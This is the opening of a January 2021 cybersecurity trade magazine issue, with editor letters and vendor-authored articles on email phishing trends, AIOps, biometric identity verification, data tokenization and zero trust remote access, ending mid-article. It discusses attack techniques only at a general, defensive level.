Cyber Defense Emagazine January 2021

3 Email Hacking Techniques to Watch In 2021

5 AIOps Trends That Will Shape 2021

Zero Trust Remote Access for Engineering Teams

Communication Streaming Challenges

…and much more…

CONTENTS Welcome to CDM’s January 2021 Issue ------7 3 Email Hacking Techniques to Watch In 2021 ------23 By Adrien Gendre, Chief Product & Services Officer, Vade Secure 5 AIOps Trends That Will Shape 2021 ------26 By Tej Redkar, Chief Product Officer at LogicMonitor Securing Digital Identities in A Predominantly Remote World ------30 By Bob Eckel, President & CEO, Aware, Inc. Businesses Must Protect Their Most Critical Asset: Their Data ------33 By Trevor J. Morgan, Ph.D., Product Manager at comforte AG Zero Trust Remote Access for Engineering Teams------36 By Colin Rand, VP of Engineering, Banyan Security Cryptocurrency Ransomware Is on The Rise During COVID-19 – Here’s What Businesses of All Sizes Need to Know About Dealing with Attacks ------41 By Marc Grens, Co-Founder & President at DigitalMint E-Commerce and Lockdown: The Perfect Storm for Cyber Threats ------44 By Aman Johal, Lawyer and Director of Your Lawyers Communication Streaming Challenges ------47 By Milica D. Djekic Anatomy of a hack – Solar Winds Orion ------50 By James Gorman, CISO, Authx Cybersecurity Maturity Model Certification (CMMC) ------53 By Carter Schoenberg, CISSP & CMMC Registered Practitioner Vice President – Cybersecurity SoundWay Consulting, Inc. Businesses Should See Security as An Enabler of Digital Transformation, Not A Hindrance ------57 By Matt Gyde, CEO, Security Division at NTT Ltd. Asset Management, The Weakest Link in Cybersecurity Risk ------60 By Gyan Prakash, Head of Cyber Security / Security Engineering, Altimetrik Corp

The Rising Tide of Security Threats in The Industrial Internet of Things ------70 By Don Schleede, Information Security Officer at Digi International E-Merchants: Secure Your Online Sales from Cybersecurity Threats ------73 By Anthony Webb, EMEA Vice President, A10 Networks The Privileged Credential Security Advantage ------76 By Tony Goulding, Cybersecurity Evangelist at Centrify How To Keep Your Children Safe In Remote Learning Situations ------79 By Nevin Markwart, Chief Information Security Officer at FutureVault More Internal Security Needed, Less Budget – 10 Tips to Help ------82 By Jody Paterson - Founder and Executive Chairman. ERP Maestro Personal Data Breaches for GDPR Compliance: Everything You Need to Know ------86 By Dan May, Commercial Director, ramsac Brave New World: Safari Content Blocking ------89 By Andrey Meshkov, CEO and CTO at AdGuard When Businesses Get Hacked- Who Are the Victims? ------93 By Nicole Allen, Marketing Executive, SaltDNA. Security and Remote Management: What Is the Market Looking Like as We Head Towards 2021? -- 97 By Gil Pekelamn, CEO, Atera Working from Home? You’re Not Alone ------100 By Steve Hanna, Embedded Systems Work Group Co-Chair at Trusted Computing Group (TCG) and Jun Takei, Japan Regional Forum Co-Chair at Trusted Computing Group The Best Network Protection: Go Deep or Go Broad?------104 By Albert Zhichun Li, Chief Scientist, Stellar Cyber Cybersecurity Predictions For 2021 ------106 By Topher Tebow, Cybersecurity Analyst (Malware), Acronis Why 'Thinking Small' Is the Way to Stop Ransomware and Other Cyber Attacks ------109 By Yuval Baron, CEO at AlgoSec, explains why micro-segmentation is one of the most effective methods to limit the damage of attacks on a network Your Vulnerabilities are Making You Miss Your Misconfigurations ------112 By Evan Anderson, Director of Offense, Randori

Are Your Organization’s Critical Assets Five Steps or Fewer from A Cyber Attacker? ------117 By Gus Evangelakos, Director Field Engineering, XM Cyber Moving to Active Defense: What It Means, How It Works and What You Can Do Now ------120 By Ofer Israeli, CEO and founder, Illusive Networks How Next-Gen Identity Governance and Administration (IGA) Fits in with Your Hybrid IT Strategy 123 By Thomas Müller-Martin, Global Partner Technical Lead, Omada Analytics Security Insight On 2021 And Beyond ------126 By Billy Spears, Chief Information Security Officer, Alteryx Innovation, Automation and Securing A “Work from Anywhere” Environment In The Middle East - 129 By Mazen A. Dohaji, Vice President, India, Middle East, Turkey & Africa (iMETA), LogRhythm Peer-To-Peer Cybersecurity Insights For 2021 ------133 By Stuart Berman, IT Central Station Super User Transitioning to Remote Work: The Apps You’ll Need to Ensure A Productive Workforce ------135 By Ikechukwu Nnabeze, SEO Copywriter, Traqq

@MILIEFSKY

From the

Publisher…

New CyberDefenseMagazine.com website, plus updates at CyberDefenseTV.com & CyberDefenseRadio.com

Dear Friends,

It’s a given that we are all ready to put 2020 behind us; executing plans for a much better, brighter year in 2021. For all your support, we humbly THANK YOU SO MUCH! We so much value our readers, our partners and our sponsors.

To be sure, there will be new challenges to take the place of the ones we’ve been facing for the past year. Publication and distribution of valuable actionable information is for us the key to successfully navigating these troubled waters.

As we’ve recently notched up to the 2nd most popular cybersecurity publication and news source, we’re proud to be entering our 9th year producing Cyber Defense Magazine as we continue to focus on providing valuable resources to our readers and sponsors, reaching the right kind of executives with our shared messages. Our readers include buyers, decision-makers, and influencers in the IT/InfoSec ecosystem.

As we publish this January issue, we look ahead to the year 2021 with great anticipation for new and exciting challenges and responses in the industry. The articles in this month’s Cyber Defense Magazine, which are provided from a broad array of contributors, demonstrate that our community continues to pursue a new phase, emphasizing basics while we address broader issues as well.

In addition to the important articles in the January issue, we are pleased to continue providing the powerful combination of monthly eMagazines, daily updates, and features on the Cyber Defense Magazine home page, and webinars featuring national and international experts on topics of current interest.

Finally, we’re answering the call to help fill so many infosec job openings, entering our second year of CDM Young Women in Cybersecurity Scholarships and with our new www.cyberdefenseprofessionals.com job portal – free to post a job opening or your resume, so please leverage it and let us know how to improve it in 2021 and beyond.

Warmest regards, P.S. When you share a story or an article or information about Gary S. Miliefsky CDM, please use #CDM and @CyberDefenseMag and Gary S.Miliefsky, CISSP®, fmDHS @Miliefsky – it helps spread the word about our free resources CEO, Cyber Defense Media Group Publisher, Cyber Defense Magazine even more quickly

@CYBERDEFENSEMAG

CYBER DEFENSE eMAGAZINE

Published monthly by the team at Cyber Defense Media Group and distributed electronically via opt-in Email, HTML, PDF and Online Flipbook formats.

PRESIDENT & CO-FOUNDER Stevin Miliefsky [email protected]

INTERNATIONAL EDITOR-IN-CHIEF & CO-FOUNDER Pierluigi Paganini, CEH InfoSec Knowledge is Power. We will [email protected] always strive to provide the latest, most US EDITOR-IN-CHIEF up to date FREE InfoSec information. Yan Ross, JD [email protected]

From the International ADVERTISING Marketing Team Editor-in-Chief… [email protected]

With a new year before us, the international perspective on cybersecurity CONTACT US: matters brings renewed emphasis on competition, privacy, and regulatory compliance. Cyber Defense Magazine Toll Free: 1-833-844-9468 International: +1-603-280-4451 We see antitrust actions against several of the big tech leaders, updates of privacy rules among various jurisdictions, and new challenges from SKYPE: cyber.defense regulators. http://www.cyberdefensemagazine.com

Copyright © 2021, Cyber Defense Magazine, a division of On one hand, these trends are apparently intended to result in stronger cybersecurity overall. But in the usual manner, the law of unintended CYBER DEFENSE MEDIA GROUP (a Steven G. Samuels LLC d/b/a) consequences often overrides good intentions. 276 Fifth Avenue, Suite 704, New York, NY 10001

EIN: 454-18-8465, DUNS# 078358935.

All rights reserved worldwide. The natural tension between anti-monopoly actions on one side and regulated monopoly market behavior on the other is playing out in the cybersecurity arena. And that interplay is complicated by the cross- PUBLISHER jurisdictional nature of the industry. Gary S. Miliefsky, CISSP® A final challenging factor is that the world we live in today is a stage for Learn more about our founder & publisher at: nation-states and other governmental entities to exhibit multiple http://www.cyberdefensemagazine.com/about-our-founder/ personalities: both as cooperating authorities in regulation and as competitors in exercising control over digital assets. 9 YEARS OF EXCELLENCE! As always, we encourage cooperation and compatibility among nations and Providing free information, best practices, tips and international organizations on cybersecurity, regulatory, and privacy techniques on cybersecurity since 2012, Cyber Defense matters. magazine is your go-to-source for Information Security.

We’re a proud division of Cyber Defense Media Group: To our faithful readers, we thank you, Pierluigi Paganini MEDIAGROUP CONSUMER MAGAZINE International Editor-in-Chief B2B & B2G MAGAZINE TV RADIO AWARDS

P.S. Please visit our new consumer magazine for family and friends. PROFESSIONALS WEBINARS

Welcome to CDM’s January 2021 Issue From the U.S. Editor-in-Chief As we enter a new year, it is important to pause and reflect on both the challenges and highlights of the year just past – from a cybersecurity perspective. In 2020, Cyber Defense Magazine carried nearly 300 articles of paramount value in identifying and responding to cybersecurity threats and opportunities. Can our industry claim complete success (if that is even a fair question)? Perhaps not, but after all, we do operate in a theater of asymmetrical warfare: the defenders must bat 1000, while the attackers need only score the occasional base hit. Nonetheless, goals are worth setting and approaching as closely as possible. From a more sanguine point of view, on behalf of Cyber Defense Magazine, we can state this without fear of contradiction: If all our readers were allowed to and funded to implement all the actionable advice of our contributors and sponsors, our overall cyber experience in 2020 would have been much improved. Let’s keep the pressure on the Boards, CEOs and CFOs how important cyber hygiene has become. It’s not an insurance policy anymore, it’s a must implement, daily and even more vigorously. While we cannot change the past, we can surely learn from it. To that end, let me commend to our readers the contents of our January issue. The breadth and depth of this month’s articles cover various sources and topics, with a wealth of actionable information. With that introduction, we are pleased to present the January 2021 issue of Cyber Defense Magazine. Wishing you all success in your cyber security endeavors, Yan Ross US Editor-in-Chief Cyber Defense Magazine

About the US Editor-in-Chief Yan Ross, J.D., is a Cybersecurity Journalist & US Editor-in-Chief for Cyber Defense Magazine. He is an accredited author and educator and has provided editorial services for award-winning best-selling books on a variety of topics. He also serves as ICFE's Director of Special Projects, and the author of the Certified Identity Theft Risk Management Specialist ® XV CITRMS® course. As an accredited educator for over 20 years, Yan addresses risk management in the areas of identity theft, privacy, and cyber security for consumers and organizations holding sensitive personal information. You can reach him via his e-mail address at [email protected]

3 Email Hacking Techniques to Watch In 2021 By Adrien Gendre, Chief Product & Services Officer, Vade Secure

Ransomware hobbled businesses in 2020, while COVID-19 spawned an endless stream of cyberattacks. What both have in common is email. With 91 percent of cyberattacks beginning with an email, a single click can mean the difference between business as usual and operations standstill. Here are three hacking techniques to watch out for in 2021.

1. Leveraging images to bypass email filters Image quality might be critical to the authenticity of a phishing email, but it’s what’s going on behind the image that makes the difference between detection and delivery. Known phishing emails—or phishing emails that have been blacklisted—can find their way back into inboxes with a series of image manipulation techniques. Unfortunately, most email filters cannot detect them.

Invisible to the naked eye, images that have been even slightly manipulated cause a known phishing email to appear unique to an email filter. By distorting the color, tone, or geometry of an image, a hacker has the ability to update a blacklisted phishing email with a new image and bypass an email filter that can’t extract and analyze content from images.

Recently, we’ve been seeing an increase in the number of malicious emails containing remote based that store malicious textual content. Embedded in the body of email but hosted on outside domains, remote images must be fetched over a network to be analyzed. The process can’t be done in real-time. In November alone, Vade Secure analyzed 26.2 million remote images and blocked 261.1 million emails containing remote images.

Extracting and analyzing content from images requires Computer Vision, an expensive, resource- intensive field of artificial intelligence that has yet to become standard in email security. Until then, we expect to see manipulated images and remote-based images grow.

2. Depositing malicious emails via IMAP connections In late November, Vade Secure detected a mass wave of spam emails being deposited into mailboxes without passing through transport layers. We suspect that the hacker or hackers used a new tool called Email Appender, which is available on the dark web, to deposit the spam.

Email Appender allows hackers to validate compromised account credentials and connect directly to the accounts via IMAP. Once connected, hackers can configure proxies to avoid detection and deposit emails directly into accounts, even in bulk. Because the emails are sent from compromised accounts, it’s not necessary for hackers to spoof the email addresses. However, they can adjust the sender display names to fit the narrative of the spam campaign.

We believe that hackers are using spam messages to test Email Appender and the IMAP method before moving on to phishing and malware attacks, which require more time, effort, and skill. Hackers tend to test new techniques on consumers before moving on to corporate targets. Business users are more savvy because of mandated security awareness training, and businesses tend to have more sophisticated security systems.

When the IMAP method goes corporate, we expect platforms like Microsoft 365 to become targets. API- based email security solutions that are natively integrated with Microsoft 365 offer post-remediation capabilities not found in secure email gateways. If and when email threats bypass security, businesses can reach in and remove them, often before users have the chance to click.

3. Hijacking email threads When Emotet malware returned in July, it was made all the more difficult to detect due to thread hijacking. Leveraging user accounts already compromised by Emotet and other viruses, hackers injected themselves into legitimate email threads, spreading phishing links and malware-loaded Word documents as they posed as business colleagues and acquaintances.

While many users might be trained to inspect email for signs of spoofing, the average user is unlikely to scrutinize an email that is part of a thread. This is what makes thread hijacking so dangerous. With the conversation already established, hackers are free to converse with other users in the thread. And because their guard is down, users are likely to take the bait.

With a technique like thread hijacking, hackers can forgo border security and infiltrate a business from the inside. With the relative ease of getting inside, we expect thread hijacking to gain prominence in 2021.

Mitigating new threats The above techniques prove that hackers are not only keeping up with the advances in email security but also outpacing it in many respects. Innovations in artificial intelligence bring new detection and remediation capabilities that will only grow in the coming years. But when threats do bypass security, continuous user training, including at the moment of need, will be critical to neutralizing attacks.

About the Author Adrien Gendre is Chief Product & Services Officer at Vade Secure. His product vision and cybersecurity experience has been instrumental in Vade Secure’s evolution from startup to world leader in predictive email defense. A speaker at M3AAWG (Messaging, Malware & Mobile Anti-Abuse Working Group), Adrien is a sought-after email security expert who shares his expertise to educate businesses about email threats and facilitate new approaches in the cybersecurity community. With unparalleled access to global email threat intelligence, Adrien brings his email security expertise and innovative product approach to the ongoing development and advancement of phishing, spear phishing, and malware protection technologies at Vade Secure.

5 AIOps Trends That Will Shape 2021 By Tej Redkar, Chief Product Officer at LogicMonitor

If 2020 has taught us anything, it is that life is nothing if not unpredictable. Yet, the unforeseen possibilities of tomorrow are the very reasons why our society has fully embraced technology today. In the past decade, technology trends such as artificial intelligence (AI) and automation have improved us as a society by fostering faster collaboration and saving us a significant amount of time. At the forefront of modern-day trends is AIOps, or the practice of using AI in IT Operations (ITOps). AIOps platforms combine big data and machine learning to find patterns, identify problems, and predict and prevent future issues from occurring. More recently, AIOps has been a valuable tool in helping companies scale high volumes of data due to the unprecedented shift to a remote workforce. As AIOps continues to grow in popularity, it’s important to keep up with key trends in its progression. The following reflects a variety of trends that I have my eye on for next year.

1. AIOps Is Moving from One Data Type to Multiple Data Type Algorithms

AIOps traditionally uses big data platforms to aggregate siloed IT Operations data in one place. Looking ahead, data scientists will be designing AI algorithms to converge multiple data types, such as metrics, logs and transactions, to draw a correlation and identify differences in the combined data. The trend emerged after various probabilistic methods, such as AI, machine learning and statistical analysis were applied to metrics, logs and transactions. These actions allowed data scientists to draw a correlation

between the data sets and filter out signal from noise so that organizations can troubleshoot issues faster.

When it comes to investing in AIOps, the ultimate goal is to save people time -- either through early warnings, filtering signal from noise, or automation -- so they can focus on more important problems rather than doing repetitive routine work. Many technology companies have already started investing in that trend.

2. Remote Work Is Driving More Technology Platforms to Deploy AI To Detecting Problems

Remote work will be the legacy of 2020 and likely the new status quo moving forward. Prior to the coronavirus pandemic, data was typically concentrated in very specific areas due to collective working environments. Now that the pandemic has forced companies to support a remote workforce, every individual remote user is a data generator -- causing data volumes to skyrocket.

Monitoring employee productivity and digital continuity is crucial during these times, yet remains challenging for ITOps teams to manage. More intelligent algorithms are needed to predict issues with employee productivity or customer experience using the product remotely. This is where AI helps.

When it comes to AI, it doesn’t matter where users are working from. Once an algorithm is programmed, its only job is to ingest the data, extract intelligence, and then output the optimized value. The AI function can automate complex processing of disparate data sources and help IT teams predict problems before they occur by detecting patterns in large volumes of data.

3. AIOps will become more embedded in observability platforms

AIOps and observability will soon become counterparts to empower ITOps to do more in less time. Observability in IT refers to a system’s ability to gather actionable data and diagnose what’s happening, where it’s happening, and -- more importantly -- why an error or issue occurred within the system. This is done by combining monitoring, log analysis, and machine learning into an environment that can easily detect issues, proactively identify anomalies, and scale as necessary.

Observability platforms examine metrics, dependencies and logs, and bring them together into a unified platform to detect patterns between the different data types. This data provides greater observability into the customer experience, employee productivity, as well as digital infrastructure to help teams better understand how the business is performing.

After achieving observability, ITOps teams must answer the question of what to do with this information. That’s where AIOps comes in. By taking an algorithmic approach to ITOps combined with machine learning, IT teams can automate an influx of data to output actionable insights faster than ever before. AIOps platforms also enable their users to set dynamic thresholds, identify anomalies, and find the root cause of an issue. By embedding AIOps and observability into one unified platform, IT teams can predict problems faster and resolve them before it negatively impacts the business.

4. Security and IT Operations Will Be Better Integrated As enterprise IT environments continue to mature, the need for advanced security platforms will inevitably follow. The fundamental data sets used in security platforms, including cybersecurity and product security, are almost the same as IT operation data sets. Security algorithms dissect metrics and logs that flow through infrastructures to model historical behavioral patterns and flag anomalies. Using AI, this process can be further automated towards blocking bad actors in real-time. For example, say a hacker is trying to penetrate a firewall that is detected by either a change in the volume of data, or a change in the location of the traditional user. Security features can be used to classify that particular access as either regular access, hacker access, or insecure access. Once the access data is detected, automation systems can block the IP address of the hacker’s particular region or that particular range.

Regardless of the business problem, the underlying data required to gather this intelligence is still logs, metrics, and transactions within an infrastructure. The only difference is the problem that IT security teams are trying to solve. Security teams want to know whether a bad actor is trying to access the system, while ITOps teams are more interested in employing applications that will protect their users and provide a better customer experience. Next year, ITOps and Security teams will likely collaborate more closely to not only detect problems in the infrastructure performance, but also prevent cybersecurity threats in near real-time.

5. AIOps Platforms Will Decrease Time-to-Value

While AIOps platforms are meant to handle added complexity, humans are still required to configure and deploy them. Next year, AIOps capabilities will become more mainstream within products. SaaS products, in particular, will improve significantly with better actionable insights and new proactive capabilities within the product. This advancement will set the foundation for future integrated self-healing systems, which will further reduce the burden on human teams.

Properly educating employees on AIOps platforms also affects time-to-value. AIOps platforms are most efficient when they are managed by the right team. Investing in AIOps just to say you have it doesn’t add value to the business if IT isn’t sure how to use AIOps. Build a team that is cross-functional between the business, data owners, and engineers. Together, these three pillars will be able to derive real value out of any AIOps initiative.

I constantly see organizations driving initiatives tied to buzzwords instead of a real business problem. AIOps is about solving complex business problems, and, therefore, IT teams should identify the problems they want to overcome before diving in headfirst. Once that is understood across the board, solving problems using AI becomes easier. If organizations do not follow this basic advice, they will likely remain in a state of AI immaturity and will spend significant amounts of time on failed projects.

The Bottom Line AIOps is a journey, not a quarterly goal or a yearly goal. From a business perspective, AIOps should be invested in for the long-term, but only after knowing where the business stands within its own maturity journey.

About the Author Tej Redkar has been building enterprise software products for more than 20 years. He has led engineering, product management, user experience, and data science teams in industry-leading organizations like Microsoft, VMWare, Cisco, and AppDynamics. Tej has consistently delivered highly successful products like Rational Rose, VMware Labs, Microsoft Azure Machine Learning, PowerBI, and AppDynamics that have fundamentally transformed people’s productivity in respective domains. As Chief Product Officer, Tej brings the right balance of business and deep technical expertise to the team to drive strategy and execution at LogicMonitor. You can learn more about Tej Redkar and LogicMonitor at www.logicmonitor.com.

Securing Digital Identities in A Predominantly Remote World COVID-19 and the subsequent uptick in targeted cyberattacks accelerate the need for biometric- based digital onboarding By Bob Eckel, President & CEO, Aware, Inc.

As we entered 2020, organizations were beginning to undergo transformations to meet the growing demands of an increasingly digital marketplace. In adopting new technologies to streamline and accelerate business operations, banks and other consumer-focused businesses aimed to drive steady increases of biometric-based digital onboarding methods. These industries were striving to remove friction from onboarding processes at the same time they needed to address growing security threat concerns where biometrics were gaining trust as secure, passwordless option for a broad range of authentication practices.

Then we witnessed the criticality of businesses reprioritizing their digital transformation processes as the impacts of the COVID-19 pandemic unfolded. As organizations across the world were forced to move their entire businesses online in the matter of weeks – some for the first time – they had to rapidly shift their business models to accommodate a predominantly remote workforce. With many unprepared to

handle the IT and security challenges, identities became more vulnerable and in turn protection more valuable than ever. As 2021 kicks off, it’s important that businesses understand the benefits behind biometric-based digital onboarding to ensure organizational integrity as they continue to secure the digital identities of employees and customers alike.

Enhance remote authentication against increased cyber activity

Since the beginning of 2020, there have been more than 445 million cyberattacks reported, which is double when compared to the entirety of 2019. When the pandemic forced millions of employees into remote work settings, it opened up huge opportunities for cybercriminals to take advantage of any security weak points to attacks aimed at stealing personally identifiable information (PII). In March alone, phishing attacks related to COVID-19 surged 667% as hackers aimed to separate consumers from their credentials, looking to leverage fraudulent pandemic-related information and many individuals initial entry to the all online world to gain access. Still today, as the large majority of the world remains remote and people do more shopping, learning and working at home, hackers are looking harder for ways to take advantage of weakened security.

Biometrics make the identity proofing process more robust and secure. They can’t be stolen in the same manner as your login credentials or lost like a password. They leverage unique personal data – such as face, voice, finger or iris prints – that people can store and then match later as a single or multi-factor authentication process. With facial recognition being 99.7% accurate and improving yearly, according to NIST, biometrics provides that extra layer of defense to ensure identities remain protected. Regardless of increased threats targeting users who don’t have the security training to help them to flag phishing emails and other related scams, their identities are more secure.

Ensure your customer is who they say they are by keeping fraudsters out

While facial recognition is a particularly useful biometric modality for mobile onboarding and authentication – with nearly all mobile devices having built-in cameras and microphones – the method is still vulnerable to so-called “presentation attacks” – otherwise known as “spoofs.” In short, a fraudster can try to spoof the biometric data on file by presenting a facsimile, such as a photo, video recording or mask. In mobile un-proctored onboarding, a fraudster can try to impersonate a victim using a false match presentation attack. In doing so, they can falsely use their victim’s identity to open a new account. By registering a false image – a picture of a random person, a smudged image that wouldn’t be biometrically searchable – a fraudster could work to open up new fake accounts.

To protect against these ploys, it’s essential to apply robust liveness detection when using facial recognition for unattended or un-proctored mobile applications. There are a couple of ways in mitigating the risk of facial presentation attacks through liveness detection algorithms: by analyzing facial images to determine whether they are of a live human being or a reproduction or by adding a second biometric modality, such as voice or speaker recognition. “Passive” liveness detection addresses this issue by distinguishing between a live person and a spoof without forcing the user to participate in the matching process.

Provide a touchless onboarding process to meet social-distancing guidelines

Part of the appeal of biometric authentication technologies during a pandemic or Flu season is the touchless access they provide. Voice biometrics and face recognition enable hands-free authentication and access, eliminating the need to use on-site PIN pads, card readers or kiosks. To limit the spread of the virus, businesses need to shift more of their onboarding functions online. By focusing on implementing frictionless authentication processes through the use of biometrics, organizations can ensure that customers remain safe, physically, at the same time that they verify that customers are who they claim they are when in-person verification is not an option.

Additionally, providing a positive onboarding experience can be a critical business differentiator. This is especially true for banks, which are facing pressure from online competitors and seeing their services commoditized. If they get the onboarding right, they can secure a customer’s loyalty for a lifetime. Forcing a customer to provide physical identification multiple times or answer too many questions can sour a relationship from the start. Biometrics work better in onboarding settings when it doesn’t slow the user down.

As the world continues to leverage technology to provide a more secure, seamless, and now touchless experience for users, we can anticipate biometrics will be a driving force. Growing at a faster rate than non-biometric technology, they will be instrumental in enterprises’ moves to make the onboarding process more efficient as organizations bring identity verification to the forefront of their business operations.

About the Author

Robert A. Eckel is the Chief Executive Officer & President of Aware, Inc. He also serves on the board of directors for the International Biometrics + Identity Association (IBIA), as a strategic advisory board member of Evolv Technology, and as a consultant for Digimarc Corporation. Over his distinguished career, he has held many positions of note within the biometric and identity space, including: Regional President and Chief Executive Officer of IDEMIA’s NORAM Identity & Security division from 2017 to 2018; President and Chief Executive Officer of MorphoTrust USA, LLC from 2011 to 2017; Executive Vice President and President of the Secure Credentialing Division of L-1 Identity Solutions Company from 2008-2011; and President of the Identity Systems division of Digimarc Corporation from 2005 to 2008. Mr. Eckel has received his Master’s degree in Electrical Engineering from the University of California Los Angeles, and his Bachelor’s degree in Electrical Engineering from the University of Connecticut. Robert can be reached online on Twitter and LinkedIn and at our company website: https://www.aware.com/

WHAT IS STOPPING YOU FROM TAKING THE FUNDAMENTAL STEP OF PROTECTING YOUR DATA?

Businesses Must Protect Their Most Critical Asset: Their Data By Trevor J. Morgan, Ph.D., Product Manager at comforte AG

Protecting sensitive data is a challenge facing every business and enterprise. The value of data is rising to the extent that it is often referred to as ‘the new gold’ and a fundamental business asset. This value naturally means that many criminals are turning their efforts to focus on procuring highly sensitive personally identifiable information (PII) handled and processed by companies. While data is very dynamic, it is essential to ensure that it is secured across all stages of its lifecycle. This is especially true as many companies prioritize network agility and digital transformation over data security in an effort to continue business operations through workforce enablement. In fact, according to the KPMG CIO Survey 2020, this year has seen innovation taking greater priority alongside improving security, however “cybersecurity can sometimes become a secondary priority.” Yet, if enterprises wish to stay on the right side of data security regulations, then protecting the data itself is imperative. In fact, budgetary shifts across many industry verticals have resulted in more money being focused on securing the crown jewels of PII. One alarming trend is that data is increasingly shifting from secured corporate networks to private servers as the trend towards home working continues. This has resulted in a widespread distribution of data

within unsecured environments, ultimately meaning a loss of data control and security. If this data were to fall into the wrong hands by any means (unintentional leak or concentrated intentional attack), then the consequences would be massive. Not only would it negatively impact brand perception, but it could also result in compliance penalties from regulating bodies and severe loss of trust from savvy customers who are becoming more aware of just how valuable their data is. Regardless of how a breach happens, be it by a careless employee or malicious criminal intent, the consequences unfortunately remain the same. Therefore, business decision-makers should ensure that systems and mechanisms are in place that supersede traditional security measures. Instead of protecting siloed data at rest, or simply protecting corporate networks with a firewall, businesses should instead pivot to protect their most critical asset at the point of value: the data itself.

Why do hackers want my data? The global pandemic has greatly altered the current state of data security. As workers migrate away from internal security processes within corporate networks (mostly access- and perimeter-based), the availability of data stolen and harvested on the dark web has increased exponentially in the past few months. In fact, the cost of data on the dark web has plummeted up to 60% as of October 2020, and as of December, PII is being sold on the dark web for as little as 50 cents (USD). This perceived commoditization poses several questions. Primarily, if data is the new gold, why is obtaining it so cheap? The biggest reason that so much of this data has not been taken advantage of is because of the relative low transaction volume as a result of pandemic restrictions. The biggest challenge that enterprises face is to understand where their data is held, who has access to it, and where it is stored. Organizations must seek out and discover their data, be it structured (in a database) or unstructured data. This will not only provide security teams with a holistic understanding of their current data security posture, but it will also assist with regulatory compliance and auditing. Only by undertaking this procedure will enterprises be able to properly secure data, as you cannot defend what you cannot see. This exercise of data discovery is a deliberate attempt to known the unknowns within the total data environment. Data is a highly mobile and dynamic asset that crosses traditional boundaries of on-premise and in the cloud. Often it’s a hybrid approach, existing somewhere in both environments. This situation requires a security strategy that prioritizes the data instead of access to it or the borders around it. The only solution is to protect the data itself and not just the perimeters around it. This data-centric approach to security focuses on the focal point that criminals are striving to attack, removing the incentive for cybercriminals if the data is protected and ultimately worthless to them because it cannot be leveraged.

Protecting PII But how can businesses look to deploy data-centric security to their advantage? The most widely accepted solution when it comes to data-centric security is tokenization. In plain terms, tokenization replaces PII data with a substitute representational token. This means that protected tokenized data is still available for analytical purposes and other aspects of corporate workflows, but in the wrong hands it has no discernable meaning and thus no value, and as it cannot be transformed into plain text it means that even if this data were misplaced or mishandled then the pseudonymized data would not be considered punishable under CCPA. Regulatory compliance is still met.

Tokenization also allows businesses to protect data upstream, allowing downstream applications and systems to inherit protection and close security gaps across the enterprise. Referential integrity means the protected values can be used for analytics without the need to de-protect the data, passing all system and validity checks across the system. This condition helps to meet another best practice in data security, which is to avoid de-protecting data as much as possible. Currently, organizations spend considerable money in order to reduce risk, be it in the form of endpoint and mobile protection, cloud security, app security, or network defense. These traditional perimeter- based security methods only protect against known attack vectors, meaning that it is impossible to totally prevent data breaches and mitigate this threat with current piece-meal security approaches. In fact, further benefits of deploying data-centric security, and in particular tokenization, include the clear return on investment capabilities. This approach to security offers more comprehensive coordination when it comes to complying with industry regulations. Indeed, for PCI DSS, such an approach can save thousands or even millions in audit costs and time. Furthermore, where data protection is considered your responsibility (and this is always the case with data your process and store in the cloud), data-centric security offers peace of mind by protecting against data breach or loss of data. For security teams struggling to enact digital transformation, trying to ensure network agility, and laboring to prevent embarrassing data breaches, data-centric security is a promising solution. It’s also one that can be deployed in weeks rather than months or years, without modification to existing applications and workflows. So, what’s stopping you from taking the fundamental step of protecting your data with data- centric security?

About the Author

Trevor J. Morgan is responsible for product management at comforte AG (https://www.comforte.com/, where he is dedicated to developing and bringing to market enterprise data protection solutions. He has spent the majority of his career in technology organizations bringing to market software, hardware and services for enterprise and government customers. Trevor has held senior-level, lead positions in sales engineering, product management, software architecture and product marketing in companies like Cisco, Capital One and Ciena. He holds a Ph.D. from Texas Tech University and a bachelor’s and master’s from Baylor University. Trevor can be reached online at https://www.linkedin.com/in/trevor-j- morgan-ph-d-8b663515/

Zero Trust Remote Access for Engineering Teams By Colin Rand, VP of Engineering, Banyan Security

Engineering organizations present numerous challenges for security programs when it comes to remote access. They need secure access to dynamic hosts, services, and applications to productively do their jobs. The infrastructure these teams require is varied, ranging from external SaaS to internally hosted web services for wikis, git and build servers, various TCP services such as SSH and RDP, as well as database access and recently a huge wave of Kubernetes. These services are complex and often undocumented, especially as projects are under active development before they reach production environments. Securing these critical R&D assets arguably makes an Engineering org the most challenging department that InfoSec teams have to manage.

VPNs, falling short of today’s security requirements with their “one size fits all” strategy, are often at the core of serious usability, manageability, and security issues.

Let’s look at an infrastructure example. Most organizations use a sequence of VPNs, Bastion hosts, and firewalls to manage network connectivity from user to server. Then, they use some combination of directory services and authentication managers to manage credentials so the user can authenticate into the server itself. Lot of moving parts, lots of available attack surface for the bad guys, and this is but a single use case.

Lately, Zero Trust is all the buzz, and for good reason. With a Zero Trust security posture, the user and device are explicitly authenticated and access is granted only for the specific server (without broad network access). By leveraging the organization’s IDP for authentication and issuing short-lived certificates with the user’s entitlements, connectivity is set up on-demand, eliminating the risk associated with static passwords and credential leakage. Real-time trust scoring enforcement allows for dynamic security policies that can be customized based on the sensitivity of server environments.

Let’s discuss some remote access challenges felt by engineering teams that are beautifully solved with a Zero Trust solution.

VPN Challenges

While access challenges cause pain and suffering to all end users, they can and do present serious issues for development teams. And, engineers, being smart and loving a challenge, unfortunately often work around those issues. Take these two anecdotes from a veteran engineering leader that highlight what goes wrong in the pits of engineering when remote access fails us – I suspect you’ll recognize the themes.

In one particularly locked-down engineering environment, developers had no access to production, no development environments were accessible without a VPN, etc. An enterprising developer who wanted to do some prototyping work from home decided that the VPN was too troublesome, so of course the dev just copied “his” source code, uploaded it to Google drive, downloaded it onto his personal workstation at home, and... you can see where this is going. The lesson – the desire to be productive was treated as more important than pesky security policy and a big security hole was created as a result.

Another time an engineer, having heard about new policies coming he didn't want to deal with, set up his own private bastion host in production. Of course, he didn't tell anyone, and soon after ended up leaving the company’s employment. Later, over drinks with a former colleague, he reminisced about what he had done, laughing about how they could still get into production anytime they wanted.

No More Excuses

Different teams have different remote access needs. All security teams think through the process of what resources are being protected, their sensitivity, and what is at risk of misuse. They have sophisticated means for analyzing risk profiles, but suffer with a blunt tool for handling the needs of the modern “remote- first” engineer. These design decisions become tradeoffs for what work needs to be done – criticality and time sensitivity of task vs. the risk that is introduced. Yesterday we were concerned about 'where' the work needed to be done. Today that is irrelevant, it's anywhere and everywhere.

Engineers are Engineers, right?

